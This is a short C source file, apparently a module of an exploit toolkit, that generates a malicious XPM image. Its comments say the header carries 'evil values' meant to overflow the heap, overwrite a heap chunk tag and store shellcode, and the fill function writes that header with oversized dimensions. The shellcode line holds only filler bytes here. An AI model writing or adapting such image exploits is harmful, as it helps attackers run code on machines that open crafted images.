#include "ximage.h"

/* 
 * XPM format is very simple.  ascii only, looks like an array of C strings 
 */
#if 0
/* XPM */
static char * test_xpm[] = {
"80 60 174 2",
"A 	c None",
". 	c #000000",
"      ..... "
};
#endif
/*
 * in this example, 80/60 is width/height, 174 is the number of color mappings,
 * 2 is the cpp, characters per pixel.  on the next line starts the mapping
 * between ascii chars and color values with # format.  after all those mappings
 * comes the actual pixel data, made up of the chars given in the preceeding
 * mapping.  none of that crap matters for us.  we just set the header in first
 * line to some evil values, and then use the second and third lines to
 * overwrite chunk tag in heap, and the fourth line to store shellcode.
 */

/* */
int ximage_other_xpm_fill(ximage_t *xp)
{
    int len = 0;
    u_char  colors[BS], pixels[BS];

    memset(colors, 'A', BS), memset(pixels, 'B', BS);

    /* allocate output buffer */
    xp->buf = calloc(1, BS);
    if(xp->buf == NULL)
        die("calloc");

    /* build image line by line */
    len += snprintf(xp->buf+len, BS-len, "/* XPM */\n");
    len += snprintf(xp->buf+len, BS-len, "static char * evil_xpm[] = {\n");
    len += snprintf(xp->buf+len, BS-len, "\"%d %d %d %d\",\n", 
                                        0x800000, 0x400000-2, 0x1, 1);
    pixels[100] = 0;
    len += snprintf(xp->buf+len, BS-len, "\"1  c #000000\",\n");
    len += snprintf(xp->buf+len, BS-len, "\"%s\",\n", pixels);
    len += snprintf(xp->buf+len, BS-len, "\"%s\",\n", pixels);
    len += snprintf(xp->buf+len, BS-len, "\"%s\",\n", pixels);

    /* and the closing brace */
    len += snprintf(xp->buf+len, BS-len, "};\n");
    xp->buflen = len;

    return 0;
}

/* */
int ximage_other_xpm_clean(ximage_t *xp)
{
    free(xp->buf);
    return 0;
}

/* */
int ximage_other_xpm_init(ximage_t *xp)
{
    return 0;
}
